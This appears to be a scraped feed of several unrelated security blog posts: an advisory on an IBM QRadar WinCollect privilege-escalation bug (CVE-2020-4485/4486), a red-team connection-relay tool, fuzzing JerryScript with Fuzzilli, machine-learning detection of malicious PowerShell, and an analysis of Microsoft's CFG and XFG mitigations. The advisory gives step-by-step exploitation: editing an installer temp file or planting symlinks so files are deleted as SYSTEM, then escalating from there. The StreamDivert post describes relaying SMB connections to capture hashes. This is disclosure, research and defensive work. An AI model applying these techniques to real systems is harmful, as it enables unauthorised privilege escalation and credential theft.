Vendor’s Advisory: https://www.ibm.com/support/pages/node/6257885

An Elevation of Privilege (EoP) exists in IBM QRadar Wincollect 7.2.0 – 7.2.9 . The vulnerability described gives the ability to a low privileged user to delete any file from the System and disable the Wincollect service. This arbitrary delete vulnerability can be leveraged in order to gain access as NT AUTHORITY\SYSTEM. During the exploitation, the attacker disables the Wincollect service.

Description

There are two distinct root causes which can lead to the same issue (arbitrary delete):
After the installation of the WinCollect, the installer remains under the folder c:\Windows\Installer . Any user with low privileges can run the installer with the following command:

msiexec /fa c:\Windows\Installer****.msi

The WinCollect’s installer, although it will eventually fail when executed by a low privileged user, it will create log files under the User’s Temp folder.

At some point, the installer will try to delete those log files as SYSTEM. As long as the user controls the files in his Temp folder (C:\Users\username\AppData\Local\Temp), they can create a symlink targeting any file in the system. When the installer tries to delete these files, it will follow the symlink and will perform the delete actions as SYSTEM.

Even if the symlinks are mitigated in the future by Microsoft, an attacker can achieve the arbitrary delete by editing the file ~xxxx.tmp .

The file C:\Users\username\AppData\Local\Temp\~xxxx.tmp where xxxx is a random hex, ends with the lines:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\Users\attacker\AppData\Local\Temp_isFD30
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\attacker\AppData\Local\Temp_isFD8F
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\attacker\AppData\Local\Temp_isFDAF

An attacker can edit these lines and add the files he wants to delete. For example:

[SearchRepalceTargetBackupFiles]
C:\Program Files\IBM\WinCollect\config\CmdLine.txt=C:\windows\win.ini
C:\Program Files\IBM\WinCollect\config\logconfig_template.xml=C:\Users\Admin\whatever.exe
C:\Program Files\IBM\WinCollect\templates\tmplt_AgentCore.xml=C:\Users\anotheruser\logs.txt

When we cancel the installer, these files will be deleted as SYSTEM.

As a bonus, during this process, the wincollect service will stop and will remain stopped, until we cancel the operation.

Exploitation

In order to Exploit the issue, no special program is needed .

In the following paragraph, a step by step explanation of the Video PoC is provided.

Please note, that the vulnerability of the IBM QRadar Wincollect ends when we delete the WER folder (or any other file/folder you want to delete).

The use of the arbitrary delete issues, in order to escalate to SYSTEM, is irrelevant to this vulnerability and it is an MS Windows issue. This technique has been described by Jonas L in his blogpost https://secret.club/2020/04/23/directory-deletion-shell.html

The delete.exe is an implementation of this technique, which can be found in my github repo https://github.com/DimopoulosElias/Primitives

Video PoC Step By Step


00:00-00:11: We present the environment. We are low privileged users and the installer file we are going to use is the 11ec43.msi . This file, belongs to IBM and is the installer file of the wincollect agent.

00:11-00:22: As low privileged users, we run the installer. At the end of this time frame (00:22) the wincollect service has stopped . We can stay at this position as long as we want to and perform any actions we want to, with the wincollect service being disabled (CVE-2020-4485).

00:22-00:58: We are going to use the technique presented by Jonas L , in order to leverage the arbitrary delete and gain access as SYSTEM. For this to be achieved, we need to delete the folder C:\ProgramData\Microsoft\Windows\WER , which can not be deleted by a low privileged user. However, some sub-folders can be deleted. At this time frame, we delete the sub-folders we are able to, without any exploitation.

00:58-02:42: By exploiting the CVE-2020-4486 , we delete the remaining files and sub-folders from the WER folder. A low privileged user, would not be able to delete those files/folders, as we presented in the previous time frame. The $INDEX_ALLOCATION is used in order to delete a folder instead of a file .

02:42-03:58: We run the exploitation procedure one more time, in order to delete the C:\ProgramData\Microsoft\Windows\WER folder. At this point, the use of CVE-2020-4486 ends. The rest of the video presents the use of this primitive in order to escalate to SYSTEM and is irrelevant to the IBM WinCollect issues.

03:58-end: Now that we have deleted the WER folder, we use the https://github.com/DimopoulosElias/Primitives is order to become a SYSTEM. Again, this has nothing to do with the IBM vulnerabilities. It’s a primitive which allows us to use any (or almost any) arbitrary delete, in order to escalate to SYSTEM.

We will leave the escalation with the use of symlinks as an exercise for you 🙂 .

Resources

GitHub

You can find our exploits code in our GitHub at https://github.com/RedyOpsResearchLabs/

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at https://redyops.com/

Angel

Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at https://angelcyber.gr/

Illicium

Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at https://deceivewithillicium.com/

Neutrify

Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at https://neurosoft.gr/contact/

The post IBM QRadar Wincollect Escalation of Privilege (CVE-2020-4485 & CVE-2020-4486) appeared first on REDYOPS Labs.

StreamDivert: Relaying (specific) network connections

10 September 2020 at 08:14

Author: Jelle Vergeer

The first part of this blog will be the story of how this tool found its way into existence, the problems we faced and the thought process followed. The second part will be a more technical deep dive into the tool itself, how to use it, and how it works.

Storytime

About 1½ half years ago I did an awesome Red Team like project. The project boils down to the following:

We were able to compromise a server in the DMZ region of the client’s network by exploiting a flaw in the authentication mechanism of the software that was used to manage that machine (awesome!). This machine hosted the server part of another piece of software. This piece of software basically listened on a specific port and clients connected to it – basic client-server model. Unfortunately, we were not able to directly reach or compromise other interesting hosts in the network. We had a closer look at that service running on the machine, dumped the network traffic, and inspected it. We came to the conclusion there were actual high value systems in the client’s network connecting to this service..! So what now? I started to reverse engineer the software and came to the conclusion that the server could send commands to clients which the client executed. Unfortunately the server did not have any UI component (it was just a service), or anything else for us to send our own custom commands to clients. Bummer! We furthermore had the restriction that we couldn’t stop or halt the service. Stopping the service, meant all the clients would get disconnected and this would actually cause quite an outage resulting in us being detected (booh). So.. to sum up:

  • We compromised a server, which hosts a server component to which clients connect.
  • Some of these clients are interesting, and in scope of the client’s network.
  • The server software can send commands to clients which clients execute (code execution).
  • The server has no UI.
  • We can’t kill or restart the service.

What now? Brainstorming resulted in the following:

  • Inject a DLL into the server to send custom commands to a specific set of clients.
  • Inject a DLL into the server and hook socket functions, and do some logic there?
  • Research if there is any Windows Firewall functionality to redirect specific incoming connections.
  • Look into the Windows Filtering Platform (WFP) and write a (kernel) driver to hook specific connections.

The first two options quickly fell of, we were too scared of messing up the injected DLL and actually crashing the server. The Windows Firewall did not seem to have any capabilities regarding redirecting specific connections from a source IP. Due to some restrictions on the ports used, the netsh redirect trick would not work for us. This left us with researching a network driver, and the discovery of an awesome opensource project: WinDivert (Thanks to DiabloHorn for the inspiration). WinDivert is basically a userland library that communicates with a kernel driver to intercept network packets, sends them to the userland application, processes and modifies the packet, and reinjects the packet into the network stack. This sounds promising! We can develop a standalone userland application that depends on a well-written and tested driver to modify and re-inject packets. If our userland application crashes, no harm is done, and the network traffic continues with the normal flow. From there on, a new tool was born: StreamDivert

StreamDivert

StreamDivert is a tool to man-in-the-middle or relay in and outgoing network connections on a system. It has the ability to, for example, relay all incoming SMB connections to port 445 to another server, or only relay specific incoming SMB connections from a specific set of source IP’s to another server. Summed up, StreamDivert is able to:

  • Relay all incoming connections to a specific port to another destination.
  • Relay incoming connections from a specific source IP to a port to another destination.
  • Relay incoming connections to a SOCKS(4a/5) server.
  • Relay all outgoing connections to a specific port to another destination.
  • Relay outgoing connections to a specific IP and port to another destination.
  • Handle TCP, UDP and ICMP traffic over IPv4 and IPv6.

Schematic inbound and outbound relaying looks like the following:

Relaying of incoming connections

Relaying of outgoing connections

Note that StreamDivert does this by leveraging the capabilities of an awesome open source library and kernel driver called WinDivert. Because packets are captured at kernel level, transported to the userland application (StreamDivert), modified, and re-injected in the kernel network stack we are able to relay network connections, regardless if there is anything actually  listening on the local destination port.

The following image demonstrates the relay process where incoming SMB connections are redirected to another machine, which is capturing the authentication hashes.

Example of an SMB connection being diverted and relayed to another server.

StreamDivert source code is open-source on GitHub and its binary releases can be downloaded here.

Detection

StreamDivert (or similar tooling modifying network packets using the WinDivert driver) can be detected based on the following event log entries:

Fuzzing JavaScript Engines with Fuzzilli

8 September 2020 at 22:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and enables you the definition of variables later used in the value section. The last one, variance is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one with the different type B, we have to include all the type A rules inside the type B object.

Here is an example of such rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software as a pure blackbox approach only scratches the attack surface. Coverage could be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output could be seen in the picture below. In my case, it was only useful for the manual code review and grammar adjustment, as there was no convenient way how to implement the mutator on the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is incredible and still a very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL could always be converted (lifted) to a valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Masters Thesis, where it was introduced, and I strongly recommend reading it as this article summarizes some of the novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork() and the measured execution per sample could be ~7 times faster. The JSE engine is modified to read the input from the fuzzer, and after it executes the sample, it obtains the coverage. The crucial part is to reset the state, which is normally (obviously) not done, as the engine uses the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented to feed the input or add additional commands.

Coverage

LLVM gives a convenient way to obtain the edge coverage. Providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we can receive a pointer to the start and end of the regions, which are initialized by the guard number, as can be read in the llvm documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to make the parent knows that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as we can see the memory corruption from the triage via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could be probably escalated from Denial of Service to Code Execution. Because of the time constraints and little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

Additional References

Machine learning from idea to reality: a PowerShell case study

2 September 2020 at 07:55

Detecting both ‘offensive’ and obfuscated PowerShell scripts in Splunk using Windows Event Log 4104

Author: Joost Jansen

This blog provides a ‘look behind the scenes’ at the RIFT Data Science team and describes the process of moving from the need or an idea for research towards models that can be used in practice. More specifically, how known and unknown PowerShell threats can be detected using Windows event log 4104. In this case study it is shown how research into detecting offensive (with the term ‘offensive’ used in the context of ‘offensive security’) and obfuscated PowerShell scripts led to models that can be used in a real-time environment.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

Introduction to PowerShell

PowerShell plays a huge role in a lot of incidents that are analyzed by Fox-IT. During the compromise of a Windows environment almost all actors use PowerShell in at least one part of their attack, as illustrated by the vast list of actors linked to this MITRE technique [1]. PowerShell code is most frequently used for reconnaissance, lateral movement and/or C2 traffic. It lends itself to these purposes, as the PowerShell cmdlets are well-integrated with the Windows operating system and it is installed along with Windows in most recent versions.

The strength of PowerShell can be illustrated with the following example. Consider the privilege-escalation enumeration script PowerUp.ps1 [2]. Although the script itself consists of 4010 lines, it can simply be downloaded and invoked using:

In this case, the script won’t even touch the disk as it’s executed in memory. Since threat actors are aware that there might be detection capabilities in place, they often encode or obfuscate their code. For example, the command executed above can also be run base64-encoded:

which has the exact same result.

Using tools like Invoke-Obfuscation [3], the command and the script itself can be obfuscated even further. For example, the following code snippet from PowerUp.ps1

can also be obfuscated as:

These well-known offensive PowerShell scripts can already be detected by using static signatures, but small modifications on the right place will circumvent the detection. Moreover, these signatures might not detect new versions of the known offensive scripts, let alone detect new techniques. Therefore, there was an urge to create models to detect offensive PowerShell scripts regardless of their obfuscation level, as illustrated in Table 1.

Table 1: Detection of different malicious PowerShell scripts

Don’t reinvent the wheel

As we don’t want to re-invent the wheel, a literature study revealed fellow security companies had already performed research on this subject [4, 5], which was a great starting point for this research. As we prefer easily explainable classification models over complex ones (e.g. the neural networks used in the previous research) and obviously faster models over slower ones, not all parts of the research were applicable. However, large parts of the data gathering & pre-processing phase were reused while the actual features and classification method were changed.

Since detecting offensive & obfuscated PowerShell scripts are separate problems, they require separate training data. For the offensive training data, PowerShell scripts embedded in “known bad” GitHub repositories were scraped. For the obfuscated training data, parts of the Revoke-Obfuscation training data set were used [6]. An equal amount of legitimate (‘known not-obfuscated’ and “known not-offensive”) scripts were added to the training sets (retrieved from the PowerShell Gallery [7]) resulting in the training sets listed in Table 2.

Table 2: Training set sizes

To keep things simple and explainable the decision was made to base the initial model on token (offensive) and character (obfuscated) percentages. This did require some preprocessing of the scripts (e.g. removing the comments), calculating the features and in the case of the offensive scripts, tokenization of the PowerShell scripts. Figures 1 & 2 illustrate how some characters and tokens are unevenly distributed among the training sets.

Figure 1: Average occurrence of several ASCII characters in obfuscated and not-obfuscated scripts
Figure 2: Average occurrence of several tokens in offensive and not-offensive scripts

The percentages were then used as features for a supervised classification model to train, along with some additional features based on known bad tokens (e.g. base64, iex and convert) and several regular expression patterns. Afterwards all features and labels were fed to our SupervisedClassification helper class, which is used in many of our projects to standardize the process of (synthetic) sampling of training data, DataFrame transformations, model selection and several other tasks. For both models, the SupervisedClassification class selected the Random Forest algorithm for the classifying task. Figure 3 summarizes the workflow for the obfuscated PowerShell model.

Figure 3: High-level overview of the training process for the obfuscation model

Usage in practice

Since these models were exported, they can be used for multiple purposes by loading the models in Python, feeding PowerShell scripts to it and observe the predicted outcomes. In this example, Splunk was chosen as the platform to use this model because it is part of our Managed Detection & Response service and because of Splunk’s ability to easily run custom Python commands.

Windows is able to log blocks of PowerShell code as it is executed, called ‘PowerShell Script Block Logging’ which can be enabled via GPO or manual registry changes. The logs (identified by Windows Event ID 4101) can then be piped to a Splunk custom command Reconstruct4101Logging, which will process the script blocks back into the format the model was trained on. Afterwards, the reconstructed script is piped into e.g. the ObfuscatedPowershell custom command, which will load the pre-trained model, predict the probabilities for the scripts being obfuscated and returns these predictions back to Splunk. This is shown in Figure 4.

Figure 4: Usage of the pre-trained model in Splunk along with the corresponding query

Performance

Back in Splunk some additional tuning can be performed (such as setting the threshold for predicting the positive class to 0.7) to reduce the amount of false positives. Using cross-validation, a precision score of 0.94 was achieved with an F1 score of 0.9 for the obfuscated PowerShell model. The performance of the offensive model is not yet as good as the obfuscated model, but since there are many parameters to tune for this model we expect this to improve in the foreseeable future. The confusion matrix for the obfuscated model is shown in Table 3.

Table 3: Confusion matrix

Despite the fact that other studies achieve even higher scores, we believe that this relatively simple and easy to understand model is a great first step, for which we can iteratively improve the scores over time. To finish off, these models are included in our Splunk Managed Detection Engine to check for offensive & obfuscated PowerShell scripts on a regular interval.

Conclusion and recommendation

PowerShell, despite being a legitimate and very useful tool, is frequently misused by threat actors for various malicious purposes. Using static signatures, well-known bad scripts can be detected, but small modifications may cause these signatures to be circumvented. To detect modified and/or new PowerShell scripts and techniques, more and better generic models should be researched and eventually be deployed in real-time log monitoring environments. PowerShell logging (including but not limited to the Windows Event Logs with ID 4104) can be used as input for these models. The recommendation is therefore to enable the PowerShell logging in your organization, at least at the most important endpoints or servers. This recommendation, among others, was already present in our whitepaper on ‘Managing PowerShell in a modern corporate environment‘ [8] back in 2017 and remains very relevant to this day. Additional information on other defensive measures that can be put into place can also be found in the whitepaper.

References

[1] https://attack.mitre.org/techniques/T1059/001/
[2] https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
[3] https://github.com/danielbohannon/Invoke-Obfuscation
[4] https://arxiv.org/pdf/1905.09538.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
[6] https://github.com/danielbohannon/Revoke-Obfuscation/tree/master/DataScience
[7] https://www.powershellgallery.com/
[8] https://www.nccgroup.com/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Base Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgtest1) is pointing to void cfgTest(), this will actually just cause void (*cfgtest1) to just execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really prevalent here - just a point of contention to the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_disaptch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is defintley a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest1. Then, using ep, we overwrite the function pointer. dps once again verifies that the function overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

